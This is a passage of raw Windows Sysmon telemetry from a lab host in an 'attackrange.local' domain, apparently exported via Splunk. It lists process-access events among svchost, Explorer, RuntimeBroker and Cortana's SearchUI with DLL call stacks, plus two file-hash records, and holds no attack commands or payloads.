12:09:56.813{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.813{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.813{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.704{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.704{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.704{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.704{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x800000000000000011115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.407{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B42949E14D603E2996595132A6FCC84C,SHA256=58E155569DD374B34C794BF1EDE53AA88098671EEB8B0AD9A6E1C82D70206A92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.875{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=BE579040B70DC2E59723B4D3C8B2892E,SHA256=DCE49E4ED1DF0AD1C47D97EB7EFA1FF4290A66E739605FA1C4AEBC4C3D74EA93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\Syst